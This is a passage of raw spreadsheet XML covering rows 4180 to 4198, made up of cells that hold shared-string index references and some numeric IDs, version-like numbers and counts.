      <c r="K4180" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4180" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4180" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4180" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4180" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4180" s="12" t="s">
        <v>26863</v>
      </c>
      <c r="Q4180" s="16">
        <v>3.1</v>
      </c>
      <c r="R4180" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4180" s="12" t="s">
        <v>26864</v>
      </c>
      <c r="T4180" s="12" t="s">
        <v>26865</v>
      </c>
      <c r="U4180" s="12" t="s">
        <v>26866</v>
      </c>
      <c r="V4180" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4180" s="12">
        <v>60785</v>
      </c>
      <c r="X4180" s="12">
        <v>7</v>
      </c>
      <c r="Y4180" s="12" t="s">
        <v>26867</v>
      </c>
    </row>
    <row r="4181" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4181" s="12">
        <v>60780</v>
      </c>
      <c r="B4181" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4181" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4181" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4181" s="12" t="s">
        <v>30766</v>
      </c>
      <c r="G4181" s="12" t="s">
        <v>26868</v>
      </c>
      <c r="H4181" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4181" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4181" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4181" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4181" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4181" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4181" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4181" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4181" s="12" t="s">
        <v>26869</v>
      </c>
      <c r="Q4181" s="16">
        <v>3.1</v>
      </c>
      <c r="R4181" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4181" s="12" t="s">
        <v>26870</v>
      </c>
      <c r="T4181" s="12" t="s">
        <v>26871</v>
      </c>
      <c r="U4181" s="12" t="s">
        <v>26711</v>
      </c>
      <c r="V4181" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4181" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4181" s="12">
        <v>1</v>
      </c>
      <c r="Y4181" s="12" t="s">
        <v>26872</v>
      </c>
    </row>
    <row r="4182" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4182" s="12">
        <v>60817</v>
      </c>
      <c r="B4182" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C4182" s="12" t="s">
        <v>28278</v>
      </c>
      <c r="D4182" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4182" s="12" t="s">
        <v>31481</v>
      </c>
      <c r="F4182" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4182" s="12" t="s">
        <v>26873</v>
      </c>
      <c r="H4182" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4182" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4182" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4182" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4182" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4182" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4182" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4182" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4182" s="12" t="s">
        <v>26874</v>
      </c>
      <c r="Q4182" s="12">
        <v>3.6</v>
      </c>
      <c r="R4182" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4182" s="12" t="s">
        <v>26875</v>
      </c>
      <c r="T4182" s="12" t="s">
        <v>26876</v>
      </c>
      <c r="U4182" s="12" t="s">
        <v>26877</v>
      </c>
      <c r="V4182" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4182" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4182" s="12">
        <v>7</v>
      </c>
      <c r="Y4182" s="12" t="s">
        <v>26878</v>
      </c>
    </row>
    <row r="4183" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4183" s="12">
        <v>60829</v>
      </c>
      <c r="B4183" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4183" s="12" t="s">
        <v>30442</v>
      </c>
      <c r="E4183" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4183" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4183" s="12" t="s">
        <v>26879</v>
      </c>
      <c r="H4183" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4183" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4183" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4183" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4183" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4183" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4183" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4183" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4183" s="12" t="s">
        <v>26880</v>
      </c>
      <c r="Q4183" s="17">
        <v>3.8</v>
      </c>
      <c r="R4183" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4183" s="12" t="s">
        <v>26881</v>
      </c>
      <c r="T4183" s="12" t="s">
        <v>25544</v>
      </c>
      <c r="U4183" s="12" t="s">
        <v>26882</v>
      </c>
      <c r="V4183" s="12" t="s">
        <v>10030</v>
      </c>
      <c r="W4183" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4183" s="12">
        <v>25</v>
      </c>
      <c r="Y4183" s="12" t="s">
        <v>26883</v>
      </c>
    </row>
    <row r="4184" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4184" s="12">
        <v>60853</v>
      </c>
      <c r="B4184" s="12" t="s">
        <v>31347</v>
      </c>
      <c r="C4184" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4184" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4184" s="12" t="s">
        <v>31471</v>
      </c>
      <c r="F4184" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4184" s="12" t="s">
        <v>26884</v>
      </c>
      <c r="H4184" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4184" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4184" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K4184" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4184" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4184" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4184" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4184" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4184" s="12" t="s">
        <v>26885</v>
      </c>
      <c r="Q4184" s="12" t="s">
        <v>28282</v>
      </c>
      <c r="R4184" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4184" s="12" t="s">
        <v>26886</v>
      </c>
      <c r="T4184" s="12" t="s">
        <v>26887</v>
      </c>
      <c r="U4184" s="12" t="s">
        <v>26888</v>
      </c>
      <c r="V4184" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W4184" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4184" s="12">
        <v>9</v>
      </c>
      <c r="Y4184" s="12" t="s">
        <v>26889</v>
      </c>
    </row>
    <row r="4185" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4185" s="12">
        <v>60859</v>
      </c>
      <c r="B4185" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4185" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4185" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4185" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4185" s="12" t="s">
        <v>26890</v>
      </c>
      <c r="H4185" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4185" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4185" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4185" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4185" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4185" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4185" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4185" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4185" s="12">
        <v>3.11</v>
      </c>
      <c r="Q4185" s="12">
        <v>3.11</v>
      </c>
      <c r="R4185" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4185" s="12" t="s">
        <v>26891</v>
      </c>
      <c r="T4185" s="12" t="s">
        <v>8391</v>
      </c>
      <c r="U4185" s="12" t="s">
        <v>26892</v>
      </c>
      <c r="V4185" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W4185" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4185" s="12">
        <v>7</v>
      </c>
      <c r="Y4185" s="12" t="s">
        <v>26893</v>
      </c>
    </row>
    <row r="4186" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4186" s="12">
        <v>60865</v>
      </c>
      <c r="B4186" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4186" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4186" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4186" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4186" s="12" t="s">
        <v>26894</v>
      </c>
      <c r="H4186" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4186" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4186" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K4186" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4186" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4186" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4186" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4186" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4186" s="12" t="s">
        <v>26895</v>
      </c>
      <c r="Q4186" s="12">
        <v>3.11</v>
      </c>
      <c r="R4186" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4186" s="12" t="s">
        <v>26896</v>
      </c>
      <c r="T4186" s="12" t="s">
        <v>16228</v>
      </c>
      <c r="U4186" s="12" t="s">
        <v>26897</v>
      </c>
      <c r="V4186" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4186" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4186" s="12">
        <v>12</v>
      </c>
      <c r="Y4186" s="12" t="s">
        <v>26898</v>
      </c>
    </row>
    <row r="4187" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4187" s="12">
        <v>60941</v>
      </c>
      <c r="B4187" s="12" t="s">
        <v>31154</v>
      </c>
      <c r="C4187" s="12" t="s">
        <v>31165</v>
      </c>
      <c r="D4187" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4187" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4187" s="12" t="s">
        <v>31164</v>
      </c>
      <c r="G4187" s="12" t="s">
        <v>26899</v>
      </c>
      <c r="H4187" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4187" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4187" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4187" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4187" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4187" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4187" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4187" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4187" s="12">
        <v>3.11</v>
      </c>
      <c r="Q4187" s="12">
        <v>3.11</v>
      </c>
      <c r="R4187" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4187" s="12" t="s">
        <v>26900</v>
      </c>
      <c r="T4187" s="12" t="s">
        <v>26901</v>
      </c>
      <c r="U4187" s="12" t="s">
        <v>26902</v>
      </c>
      <c r="V4187" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4187" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4187" s="12">
        <v>13</v>
      </c>
      <c r="Y4187" s="12" t="s">
        <v>26903</v>
      </c>
    </row>
    <row r="4188" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4188" s="12">
        <v>61231</v>
      </c>
      <c r="B4188" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4188" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4188" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4188" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4188" s="12" t="s">
        <v>26904</v>
      </c>
      <c r="H4188" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4188" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4188" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4188" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4188" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4188" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4188" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4188" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4188" s="12">
        <v>3.11</v>
      </c>
      <c r="Q4188" s="12">
        <v>3.11</v>
      </c>
      <c r="R4188" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4188" s="12" t="s">
        <v>26905</v>
      </c>
      <c r="T4188" s="12" t="s">
        <v>26906</v>
      </c>
      <c r="U4188" s="12" t="s">
        <v>26907</v>
      </c>
      <c r="V4188" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4188" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4188" s="12">
        <v>13</v>
      </c>
      <c r="Y4188" s="12" t="s">
        <v>26908</v>
      </c>
    </row>
    <row r="4189" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4189" s="12">
        <v>61241</v>
      </c>
      <c r="B4189" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4189" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4189" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4189" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4189" s="12" t="s">
        <v>26909</v>
      </c>
      <c r="H4189" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4189" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4189" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4189" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4189" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4189" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4189" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4189" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4189" s="12" t="s">
        <v>26910</v>
      </c>
      <c r="Q4189" s="12">
        <v>3.11</v>
      </c>
      <c r="R4189" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4189" s="12" t="s">
        <v>26911</v>
      </c>
      <c r="T4189" s="12" t="s">
        <v>26912</v>
      </c>
      <c r="U4189" s="12" t="s">
        <v>26913</v>
      </c>
      <c r="V4189" s="12" t="s">
        <v>26469</v>
      </c>
      <c r="W4189" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4189" s="12">
        <v>8</v>
      </c>
      <c r="Y4189" s="12" t="s">
        <v>26914</v>
      </c>
    </row>
    <row r="4190" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4190" s="12">
        <v>61291</v>
      </c>
      <c r="B4190" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4190" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4190" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4190" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4190" s="12" t="s">
        <v>26915</v>
      </c>
      <c r="H4190" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4190" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4190" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K4190" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4190" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4190" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4190" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4190" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4190" s="12" t="s">
        <v>26916</v>
      </c>
      <c r="Q4190" s="12">
        <v>3.11</v>
      </c>
      <c r="R4190" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4190" s="12" t="s">
        <v>26917</v>
      </c>
      <c r="T4190" s="12" t="s">
        <v>26918</v>
      </c>
      <c r="U4190" s="12" t="s">
        <v>26919</v>
      </c>
      <c r="V4190" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W4190" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4190" s="12">
        <v>6</v>
      </c>
      <c r="Y4190" s="12" t="s">
        <v>26920</v>
      </c>
    </row>
    <row r="4191" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4191" s="12">
        <v>61561</v>
      </c>
      <c r="B4191" s="12" t="s">
        <v>31371</v>
      </c>
      <c r="D4191" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4191" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4191" s="12" t="s">
        <v>26921</v>
      </c>
      <c r="H4191" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4191" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4191" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4191" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4191" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4191" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4191" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4191" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4191" s="12" t="s">
        <v>26922</v>
      </c>
      <c r="Q4191" s="12">
        <v>3.11</v>
      </c>
      <c r="R4191" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4191" s="12" t="s">
        <v>26923</v>
      </c>
      <c r="T4191" s="12" t="s">
        <v>26924</v>
      </c>
      <c r="U4191" s="12" t="s">
        <v>26925</v>
      </c>
      <c r="V4191" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4191" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4191" s="12">
        <v>11</v>
      </c>
      <c r="Y4191" s="12" t="s">
        <v>26926</v>
      </c>
    </row>
    <row r="4192" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4192" s="12">
        <v>61591</v>
      </c>
      <c r="B4192" s="12" t="s">
        <v>31370</v>
      </c>
      <c r="D4192" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4192" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4192" s="12" t="s">
        <v>26927</v>
      </c>
      <c r="H4192" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4192" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J4192" s="12" t="s">
        <v>10712</v>
      </c>
      <c r="K4192" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4192" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4192" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4192" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4192" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4192" s="12" t="s">
        <v>26928</v>
      </c>
      <c r="Q4192" s="16">
        <v>3.1</v>
      </c>
      <c r="R4192" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4192" s="12" t="s">
        <v>26929</v>
      </c>
      <c r="T4192" s="12" t="s">
        <v>26930</v>
      </c>
      <c r="U4192" s="12" t="s">
        <v>26931</v>
      </c>
      <c r="V4192" s="12" t="s">
        <v>10712</v>
      </c>
      <c r="W4192" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4192" s="12">
        <v>0</v>
      </c>
      <c r="Y4192" s="12" t="s">
        <v>26932</v>
      </c>
    </row>
    <row r="4193" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4193" s="12">
        <v>61781</v>
      </c>
      <c r="B4193" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4193" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4193" s="12" t="s">
        <v>31561</v>
      </c>
      <c r="F4193" s="12" t="s">
        <v>30285</v>
      </c>
      <c r="G4193" s="12" t="s">
        <v>26933</v>
      </c>
      <c r="H4193" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4193" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4193" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4193" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4193" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4193" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4193" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4193" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4193" s="12" t="s">
        <v>26916</v>
      </c>
      <c r="Q4193" s="12">
        <v>3.11</v>
      </c>
      <c r="R4193" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4193" s="12" t="s">
        <v>26934</v>
      </c>
      <c r="T4193" s="12" t="s">
        <v>26935</v>
      </c>
      <c r="U4193" s="12" t="s">
        <v>26936</v>
      </c>
      <c r="V4193" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4193" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4193" s="12">
        <v>29</v>
      </c>
      <c r="Y4193" s="12" t="s">
        <v>26937</v>
      </c>
    </row>
    <row r="4194" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4194" s="12">
        <v>61891</v>
      </c>
      <c r="B4194" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4194" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4194" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4194" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4194" s="12" t="s">
        <v>26938</v>
      </c>
      <c r="H4194" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4194" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4194" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K4194" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4194" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4194" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4194" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4194" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4194" s="12" t="s">
        <v>26939</v>
      </c>
      <c r="Q4194" s="12">
        <v>3.12</v>
      </c>
      <c r="R4194" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4194" s="12" t="s">
        <v>26940</v>
      </c>
      <c r="T4194" s="12" t="s">
        <v>26941</v>
      </c>
      <c r="U4194" s="12" t="s">
        <v>26942</v>
      </c>
      <c r="V4194" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4194" s="12">
        <v>67461</v>
      </c>
      <c r="X4194" s="12">
        <v>92</v>
      </c>
      <c r="Y4194" s="12" t="s">
        <v>26943</v>
      </c>
    </row>
    <row r="4195" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4195" s="12">
        <v>62461</v>
      </c>
      <c r="B4195" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C4195" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4195" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4195" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F4195" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4195" s="12" t="s">
        <v>26944</v>
      </c>
      <c r="H4195" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4195" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4195" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4195" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4195" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4195" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4195" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4195" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4195" s="12" t="s">
        <v>26945</v>
      </c>
      <c r="Q4195" s="16">
        <v>3.1</v>
      </c>
      <c r="R4195" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4195" s="12" t="s">
        <v>26946</v>
      </c>
      <c r="T4195" s="12" t="s">
        <v>26947</v>
      </c>
      <c r="U4195" s="12" t="s">
        <v>26948</v>
      </c>
      <c r="V4195" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4195" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4195" s="12">
        <v>4</v>
      </c>
      <c r="Y4195" s="12" t="s">
        <v>26949</v>
      </c>
    </row>
    <row r="4196" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4196" s="12">
        <v>62601</v>
      </c>
      <c r="B4196" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4196" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4196" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4196" s="12" t="s">
        <v>30453</v>
      </c>
      <c r="G4196" s="12" t="s">
        <v>26950</v>
      </c>
      <c r="H4196" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4196" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4196" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4196" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4196" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4196" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4196" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4196" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4196" s="12">
        <v>3.11</v>
      </c>
      <c r="Q4196" s="12">
        <v>3.11</v>
      </c>
      <c r="R4196" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4196" s="12" t="s">
        <v>26951</v>
      </c>
      <c r="T4196" s="12" t="s">
        <v>26952</v>
      </c>
      <c r="U4196" s="12" t="s">
        <v>26953</v>
      </c>
      <c r="V4196" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4196" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4196" s="12">
        <v>2</v>
      </c>
      <c r="Y4196" s="12" t="s">
        <v>26954</v>
      </c>
    </row>
    <row r="4197" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4197" s="12">
        <v>62801</v>
      </c>
      <c r="B4197" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D4197" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4197" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4197" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4197" s="12" t="s">
        <v>26955</v>
      </c>
      <c r="H4197" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4197" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4197" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4197" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4197" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4197" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4197" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4197" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4197" s="12" t="s">
        <v>26956</v>
      </c>
      <c r="Q4197" s="12">
        <v>3.12</v>
      </c>
      <c r="R4197" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4197" s="12" t="s">
        <v>26957</v>
      </c>
      <c r="T4197" s="12" t="s">
        <v>26958</v>
      </c>
      <c r="U4197" s="12" t="s">
        <v>26959</v>
      </c>
      <c r="V4197" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4197" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4197" s="12">
        <v>29</v>
      </c>
      <c r="Y4197" s="12" t="s">
        <v>26960</v>
      </c>
    </row>
    <row r="4198" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4198" s="12">
        <v>64251</v>
      </c>
      <c r="B4198" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4198" s="12" t="s">
        <v>30121</v>
      </c>
      <c r="E4198" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4198" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4198" s="12" t="s">
        <v>26983</v>
      </c>
      <c r="H4198" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4198" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4198" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4198" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4198" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4198" s="12" t="s">
